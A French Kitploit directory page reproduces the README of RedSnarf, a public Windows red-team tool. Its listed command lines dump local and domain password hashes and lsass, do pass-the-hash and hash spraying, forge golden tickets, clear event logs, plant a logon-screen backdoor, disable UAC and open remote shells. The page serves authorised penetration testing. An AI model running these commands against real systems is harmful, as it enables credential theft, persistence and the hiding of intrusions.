Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
redsnarf — RedSnarf est un outil de test d'intrusion / red teaming pour environnements Windows. | Kitploit
Outils/GitHubGitHub/nccgroup/redsnarf
Cassage de Mots de PasseEscalade de PrivilègesGénération de PayloadsExploitationAnalyse de HachageMouvement LatéralCollecte d'InformationsPost-ExploitationTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à Distance
1.2k235il y a 8 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHubnccgroup/redsnarf

redsnarf

RedSnarf est un outil de test d'intrusion / red teaming pour environnements Windows.

Voir le dépôtSite web
root@kitploit:~
    ______           .____________                     _____  
\______   \ ____   __| _/   _____/ ____ _____ ________/ ____\ 
 |       _// __ \ / __ |\_____  \ /    \\__  \\_  __ \   __\  
 |    |   \  ___// /_/ |/        \   |  \/ __ \|  | \/|  |    
 |____|_  /\___  >____ /_______  /___|  (____  /__|   |__|    
        \/     \/     \/       \/     \/     \/         
                                  [email protected]
                                                  @redsnarf

GitHub license

RedSnarf est un outil de test d'intrusion / red-teaming par Ed Williams pour récupérer les hashs et les identifiants à partir de postes de travail Windows, serveurs et contrôleurs de domaine en utilisant des techniques OpSec sûres.

Voir notre chaîne YouTube pour les vidéos https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ

Les fonctionnalités de RedSnarf incluent :

• Récupération des hashs SAM locaux
• Énumération des utilisateurs s'exécutant avec des privilèges système élevés et leur mot de passe LSA secrets correspondant ;
• Récupération des credentials en cache MS ;
• Pass-the-hash ;
• Identification rapide des combinaisons nom d'utilisateur/mot de passe faibles et devinables (par défaut administrator/Password01) ;
• Capacité de récupérer les hashs sur une plage ;
• Hash spraying -
Credsfile acceptera un mélange de pwdump, fgdump et de nom d'utilisateur et mot de passe en texte clair séparés par un espace ;
• Dump de Lsass pour analyse hors ligne avec Mimikatz ;
• Dump des hashs du contrôleur de domaine en utilisant NTDSUtil et récupération de NTDS.dit pour analyse locale ;
• Dump des hashs du contrôleur de domaine en utilisant la méthode drsuapi ;
• Récupération du dossier Scripts and Policies d'un contrôleur de domaine et analyse pour 'password' et 'administrator' ;
• Capacité à déchiffrer les hashs cpassword ;
• Capacité à lancer un shell sur une machine distante ;
• Capacité d'effacer les journaux d'événements (application, sécurité, installation ou système) ; (Version interne uniquement)
• Les résultats sont enregistrés par hôte pour analyse.
• Activer/Désactiver RDP sur une machine distante.
• Changer le port RDP de 3389 à 443 sur une machine distante.
• Activer/Désactiver NLA sur une machine distante.
• Trouver où les utilisateurs sont connectés sur des machines distantes.
• Backdoor de l'écran de connexion Windows
• Activer/Désactiver UAC sur une machine distante.
• Stealth mimikatz ajouté.
• Analyse des hashs de domaine
• Capacité à déterminer quels comptes sont activés/désactivés
• Prendre une capture d'écran du bureau de l'utilisateur actif connecté à distance
• Enregistrer le bureau de l'utilisateur actif connecté à distance
• Déchiffrer Windows CPassword
• Déchiffrer le mot de passe WinSCP
• Obtenir les SPN des utilisateurs
• Récupérer les mots de passe WIFI depuis des machines distantes

Utilisation de RedSnarf

Prérequis :
Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git
CredDump7 - https://github.com/Neohapsis/creddump7
Récupération de Lsass en utilisant procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Netaddr (0.7.12) - pip install netaddr
Termcolor (1.1.0) - pip install termcolor
iconv - utilisé pour l'analyse locale des informations Mimikatz

Afficher l'aide
./redsnarf.py -h
./redsnarf.py --help

Récupérer les hashs locaux

Récupérer les hashs locaux d'une seule machine en utilisant des identifiants locaux faibles et en effaçant le journal des événements de sécurité
./redsnarf.py -H ip=10.0.0.50 -uC security

Récupérer les hashs locaux d'une seule machine en utilisant des identifiants locaux faibles et en effaçant le journal des événements d'application
./redsnarf.py -H ip=10.0.0.50 -uC application

Récupérer les hashs locaux d'une seule machine en utilisant les identifiants de l'administrateur local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .

Récupérer les hashs locaux d'une seule machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com

Récupérer les hashs sur une plage réseau en utilisant les identifiants de l'administrateur local
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .

Récupérer les hashs sur une plage réseau en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com

Récupérer les hashs sur une plage réseau en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com

Hash Spraying

Pulvériser des hashs sur une plage réseau
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .

Récupérer les hashs sur une plage réseau avec connexion de domaine
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com

Vérifier rapidement les identifiants
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y

Vérifier rapidement un fichier contenant des noms d'utilisateur (-hS) et un mot de passe générique (-hP)
./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y

Récupérer les hashs de domaine

Récupérer les hashs en utilisant la méthode drsuapi (la plus rapide)
Cette méthode prend en charge un indicateur optionnel -q y qui interrogera LDAP et affichera si les comptes sont actifs ou désactivés ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)

Récupérer les hashs en utilisant NTDSUtil
Cette méthode prend en charge un indicateur optionnel -q y qui interrogera LDAP et affichera si les comptes sont actifs ou désactivés ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)

Génération de Golden Ticket
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y

Collecte d'informations

Copier le dossier Policies and Scripts d'un contrôleur de domaine et analyser pour 'password' et 'administrator'
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y

Déchiffrer Cpassword
./redsnarf.py -uG cpassword

Trouver un utilisateur - En ligne
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name

Trouver un utilisateur - Hors ligne (recherche dans les informations pré-téléchargées)
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name

Afficher la liste des tâches NT AUTHORITY\SYSTEM
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y

Capture d'écran du bureau d'un utilisateur actif connecté à distance
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y

Divers

Lancer un shell sur une machine en utilisant les identifiants de l'administrateur local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y

Lancer un shell sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y

Récupérer une copie de lsass pour analyse hors ligne avec Mimikatz sur une machine en utilisant les identifiants de l'administrateur local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y

Exécuter stealth mimikatz, cette option démarre un serveur web pour servir un script PowerShell, celui-ci est obfusqué et encodé côté machine, les données ne touchent pas le disque - les identifiants sont extraits dans un style facile à lire et renvoyés à l'écran.
./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y

Exécuter une commande personnalisée
Exemple 1
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'

Exemple 2 - Les guillemets doubles doivent être échappés avec \
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'

Politique de jeton d'accès local
Crée un fichier batch lat.bat que vous pouvez copier et coller sur la machine distante pour l'exécuter, ce qui modifiera le registre et activera ou désactivera les paramètres de la politique de jeton d'accès local.
./redsnarf.py -rL y

Wdigest
Activer la valeur de registre UseLogonCredential Wdigest sur une machine en utilisant les identifiants de l'administrateur de domaine ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e

Désactiver la valeur de registre UseLogonCredential Wdigest sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d

Interroger la valeur de registre UseLogonCredential Wdigest sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q

UAC
Activer la valeur de registre UAC sur une machine en utilisant les identifiants de l'administrateur de domaine ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e

Désactiver la valeur de registre UAC sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d

Interroger la valeur de registre UAC sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q

Backdoor - Backdoor de l'écran Windows - Appuyez sur Shift gauche + Alt gauche + Impr écran pour activer
Activer la valeur de registre Backdoor sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e

Désactiver la valeur de registre Backdoor sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d

Interroger la valeur de registre Backdoor sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q

AutoLogon
Activer la valeur de registre AutoLogon de Windows sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e

Désactiver la valeur de registre AutoLogon de Windows sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d

Interroger la valeur de registre AutoLogon de Windows sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q

Verrouiller une session utilisateur d'une machine distante en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y

RDP

Activer RDP sur une machine en utilisant les identifiants de l'administrateur de domaine ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e

Désactiver RDP sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d

Interroger l'état RDP sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q

Changer le port RDP de 3389 à 443 - Modifier le port RDP à 443 sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e

Changer le port RDP à la valeur par défaut 3389 sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d

Interroger la valeur du port RDP sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q

Activer le multi-RDP avec Mimikatz
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y

Activer RDP SingleSessionPerUser sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e

Désactiver RDP SingleSessionPerUser sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d

Interroger l'état RDP SingleSessionPerUser sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q

NLA

Activer NLA sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e

Désactiver NLA sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d

Interroger l'état NLA sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q

Télécharger l’outil